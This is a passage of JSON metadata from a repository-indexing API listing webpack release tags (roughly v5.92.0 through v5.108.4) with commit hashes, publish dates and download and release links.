github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp